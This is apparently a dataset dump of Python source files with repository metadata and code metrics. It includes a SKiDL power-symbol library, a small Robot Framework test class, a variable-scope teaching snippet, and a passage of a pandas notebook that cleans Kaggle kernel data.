return None | 16.5 | 17 | 0.69697 | 5 | 33 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 33 | 2 | 18 | 16.5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
2a7f0a194dea8f1b27d8f9cc4ab702817872cef7 | 167 | py | Python | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | 2 | 2022-03-17T07:55:37.000Z | 2022-03-17T08:18:44.000Z | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | 16 | 2022-03-09T09:29:34.000Z | 2022-03-14T20:29:38.000Z | tests/atest/library_from_resource/test_data/MyStuff.py | bhirsz/robotframework-sherlock | 53edb5f15517d8fbdf05eb0c84eb34332dcbf308 | [
"Apache-2.0"
] | null | null | null | import time
class MyStuff:
def my_keyword(self):
time.sleep(2)
def not_used(self):
pass
def third_keyword(self):
time.sleep(1)
| 12.846154 | 28 | 0.586826 | 23 | 167 | 4.130435 | 0.652174 | 0.231579 | 0.315789 | 0.421053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0.317365 | 167 | 12 | 29 | 13.916667 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.125 | 0.125 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
aa60ac6bf1df6214e1fb7c01bc3250dc1223faa3 | 8,114 | py | Python | skidl/libs/power_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/power_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/power_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
power = SchLib(tool=SKIDL).add_parts(*[
Part(name='+12C',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12L',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12LF',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+12VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+15V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V0',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V1',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V2',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V35',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V5',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+1V8',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+24V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+28V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+2V5',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+2V8',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VADC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VDAC',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3.3VP',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+36V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+3V3',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['+3.3V']),
Part(name='+48V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5C',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5F',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VD',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VL',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+5VP',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+6V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+8V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+9V',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+9VA',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='+BATT',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='-10V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-10V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-12V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-12V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-12VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-12VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='-15V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-15V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-24V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-24V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-36V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-36V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-48V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-48V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-5V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-5V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-5VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-5VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='-6V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-6V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-8V',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-8V',func=Pin.PWRIN,do_erc=True)]),
Part(name='-9VA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='-9VA',func=Pin.PWRIN,do_erc=True)]),
Part(name='AC',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='AC',func=Pin.PWRIN,do_erc=True)]),
Part(name='~Earth',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='~Earth_Clean',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='~Earth_Protective',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='GND',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDA',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDD',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDPWR',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDPWR',func=Pin.PWRIN,do_erc=True)]),
Part(name='GNDREF',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GNDREF',func=Pin.PWRIN,do_erc=True)]),
Part(name='HT',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='PWR_FLAG',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='VAA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VAA',func=Pin.PWRIN,do_erc=True)]),
Part(name='VCC',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='VCOM',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VCOM',func=Pin.PWRIN,do_erc=True)]),
Part(name='VDD',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='VDDA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VDDA',func=Pin.PWRIN,do_erc=True)]),
Part(name='VEE',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VEE',func=Pin.PWRIN,do_erc=True)]),
Part(name='VMEM',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VMEM',func=Pin.PWRIN,do_erc=True)]),
Part(name='VPP',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VPP',func=Pin.PWRIN,do_erc=True)]),
Part(name='VSS',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VSS',func=Pin.PWRIN,do_erc=True)]),
Part(name='VSSA',dest=TEMPLATE,tool=SKIDL,keywords='POWER, PWR',ref_prefix='#PWR',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VSSA',func=Pin.PWRIN,do_erc=True)])])
| 78.019231 | 122 | 0.653439 | 1,318 | 8,114 | 3.901366 | 0.069044 | 0.095294 | 0.171529 | 0.285881 | 0.929016 | 0.929016 | 0.92396 | 0.915403 | 0.796188 | 0.611435 | 0 | 0.022612 | 0.127927 | 8,114 | 103 | 123 | 78.776699 | 0.70407 | 0 | 0 | 0 | 0 | 0 | 0.103771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009901 | 0 | 0.009901 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa69b37f61d65ea9b02e0cb0d3d9816c25770cff | 37 | py | Python | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | code/CM4_portee1.py | christophesaintjean/IntroProgS1_2020 | 99555d1e3681d88ee023592a16caecdec6f7c0b4 | [
"CC0-1.0"
] | null | null | null | def f():
a = 2 * x
x = 4
f() | 7.4 | 13 | 0.27027 | 8 | 37 | 1.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.513514 | 37 | 5 | 14 | 7.4 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aaabd28ef97951a4cf330fedd0f2de5a14876cba | 172,122 | py | Python | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | Data_preparation/DataCleaner.py | abishekpadaki/recommendation_system_kaggle | 30661ffd66bd1eadf2b3e4cd4144ca60588e1776 | [
"MIT"
] | null | null | null | {
"cells": [
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import matplotlib.pyplot as plt\n",
"%matplotlib inline"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {
"scrolled": true
},
"outputs": [],
"source": [
"#Add Language and Id to kernel\n",
"lang = pd.read_csv('../Datasets/KernelLanguages.csv')\n",
"kern = pd.read_csv('../Datasets/KernelVersions.csv')\n",
"kernel = pd.read_csv('../Datasets/Kernels.csv')\n",
"kern = kern[['KernelId','KernelLanguageId']]\n",
"kern.drop_duplicates(subset='KernelId',keep='last',inplace=True)\n",
"lang = lang[['Id','DisplayName']]\n",
"lang.columns = ['KernelLanguageId','DisplayName']\n",
"out = pd.merge(kern,lang,on = 'KernelLanguageId')\n",
"out = out.sort_values('KernelId')\n",
"out.columns = ['Id','LanguageId','LanguageName']\n",
"df = kernel.merge(out,on = 'Id',how = 'inner')\n",
"df = df.drop(['CreationDate','EvaluationDate','MadePublicDate','MedalAwardDate','LanguageId'],axis = 1)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"# Fixing vote with 0 views\n",
"temp = df[['TotalViews','TotalVotes']].copy()\n",
"temp = temp[(temp.TotalVotes > 0) & (temp.TotalViews == 0)]\n",
"df.loc[temp.index,'TotalVotes'] = 0"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/usr/local/lib/python2.7/dist-packages/ipykernel_launcher.py:1: SettingWithCopyWarning: \n",
"A value is trying to be set on a copy of a slice from a DataFrame\n",
"\n",
"See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n",
" \"\"\"Entry point for launching an IPython kernel.\n",
"/usr/local/lib/python2.7/dist-packages/ipykernel_launcher.py:2: SettingWithCopyWarning: \n",
"A value is trying to be set on a copy of a slice from a DataFrame\n",
"\n",
"See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n",
" \n"
]
},
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>1.0</td>\n",
" <td>False</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>False</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>9.0</td>\n",
" <td>False</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>13.0</td>\n",
" <td>False</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>15.0</td>\n",
" <td>False</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>27.0</td>\n",
" <td>False</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>49.0</td>\n",
" <td>False</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>54.0</td>\n",
" <td>False</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>55.0</td>\n",
" <td>False</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>9</th>\n",
" <td>13</td>\n",
" <td>993</td>\n",
" <td>6468.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>73.0</td>\n",
" <td>False</td>\n",
" <td>installed-packages</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>10</th>\n",
" <td>14</td>\n",
" <td>993</td>\n",
" <td>269065.0</td>\n",
" <td>NaN</td>\n",
" <td>14925.0</td>\n",
" <td>77.0</td>\n",
" <td>False</td>\n",
" <td>installed-r-packages</td>\n",
" <td>NaN</td>\n",
" <td>7921</td>\n",
" <td>2</td>\n",
" <td>6</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>11</th>\n",
" <td>15</td>\n",
" <td>993</td>\n",
" <td>520.0</td>\n",
" <td>NaN</td>\n",
" <td>20068.0</td>\n",
" <td>140.0</td>\n",
" <td>False</td>\n",
" <td>example-handwritten-digits</td>\n",
" <td>3.0</td>\n",
" <td>29080</td>\n",
" <td>8</td>\n",
" <td>36</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>12</th>\n",
" <td>16</td>\n",
" <td>993</td>\n",
" <td>154.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>141.0</td>\n",
" <td>False</td>\n",
" <td>mean-digits</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>13</th>\n",
" <td>17</td>\n",
" <td>993</td>\n",
" <td>649.0</td>\n",
" <td>NaN</td>\n",
" <td>18337.0</td>\n",
" <td>155.0</td>\n",
" <td>False</td>\n",
" <td>pixel-mean-and-variances-by-digit</td>\n",
" <td>NaN</td>\n",
" <td>9989</td>\n",
" <td>5</td>\n",
" <td>8</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>14</th>\n",
" <td>20</td>\n",
" <td>993</td>\n",
" <td>803.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>171.0</td>\n",
" <td>False</td>\n",
" <td>random-forest-benchmark-tree-4</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>15</th>\n",
" <td>21</td>\n",
" <td>993</td>\n",
" <td>1227.0</td>\n",
" <td>NaN</td>\n",
" <td>17462.0</td>\n",
" <td>185.0</td>\n",
" <td>False</td>\n",
" <td>random-forest-benchmark-1</td>\n",
" <td>2.0</td>\n",
" <td>52294</td>\n",
" <td>23</td>\n",
" <td>91</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>16</th>\n",
" <td>22</td>\n",
" <td>206545</td>\n",
" <td>190.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>188.0</td>\n",
" <td>False</td>\n",
" <td>dougg-test</td>\n",
" <td>NaN</td>\n",
" <td>164</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>17</th>\n",
" <td>23</td>\n",
" <td>114978</td>\n",
" <td>193.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>191.0</td>\n",
" <td>False</td>\n",
" <td>some-basic-stats</td>\n",
" <td>NaN</td>\n",
" <td>230</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>18</th>\n",
" <td>24</td>\n",
" <td>114978</td>\n",
" <td>308.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>194.0</td>\n",
" <td>False</td>\n",
" <td>rotate-all-the-features</td>\n",
" <td>NaN</td>\n",
" <td>2491</td>\n",
" <td>0</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>19</th>\n",
" <td>25</td>\n",
" <td>993</td>\n",
" <td>213.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>209.0</td>\n",
" <td>False</td>\n",
" <td>running-system-commands</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>20</th>\n",
" <td>26</td>\n",
" <td>993</td>\n",
" <td>212.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>212.0</td>\n",
" <td>False</td>\n",
" <td>running-system-commands-1</td>\n",
" <td>NaN</td>\n",
" <td>84</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>21</th>\n",
" <td>27</td>\n",
" <td>993</td>\n",
" <td>294.0</td>\n",
" <td>NaN</td>\n",
" <td>35477.0</td>\n",
" <td>214.0</td>\n",
" <td>False</td>\n",
" <td>we-have-imagemagick-installed</td>\n",
" <td>NaN</td>\n",
" <td>685</td>\n",
" <td>1</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>22</th>\n",
" <td>29</td>\n",
" <td>114978</td>\n",
" <td>238.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>216.0</td>\n",
" <td>False</td>\n",
" <td>randombananaclassifier</td>\n",
" <td>NaN</td>\n",
" <td>766</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>23</th>\n",
" <td>30</td>\n",
" <td>9679</td>\n",
" <td>236.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>236.0</td>\n",
" <td>False</td>\n",
" <td>mytest</td>\n",
" <td>NaN</td>\n",
" <td>124</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>24</th>\n",
" <td>31</td>\n",
" <td>185835</td>\n",
" <td>261.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>239.0</td>\n",
" <td>False</td>\n",
" <td>peek-data</td>\n",
" <td>NaN</td>\n",
" <td>1064</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>25</th>\n",
" <td>32</td>\n",
" <td>19605</td>\n",
" <td>244.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>244.0</td>\n",
" <td>False</td>\n",
" <td>example-r</td>\n",
" <td>NaN</td>\n",
" <td>337</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>26</th>\n",
" <td>33</td>\n",
" <td>319768</td>\n",
" <td>253.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>253.0</td>\n",
" <td>False</td>\n",
" <td>testo</td>\n",
" <td>NaN</td>\n",
" <td>58</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>27</th>\n",
" <td>34</td>\n",
" <td>28963</td>\n",
" <td>19064.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>262.0</td>\n",
" <td>False</td>\n",
" <td>python</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>28</th>\n",
" <td>35</td>\n",
" <td>320040</td>\n",
" <td>264.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
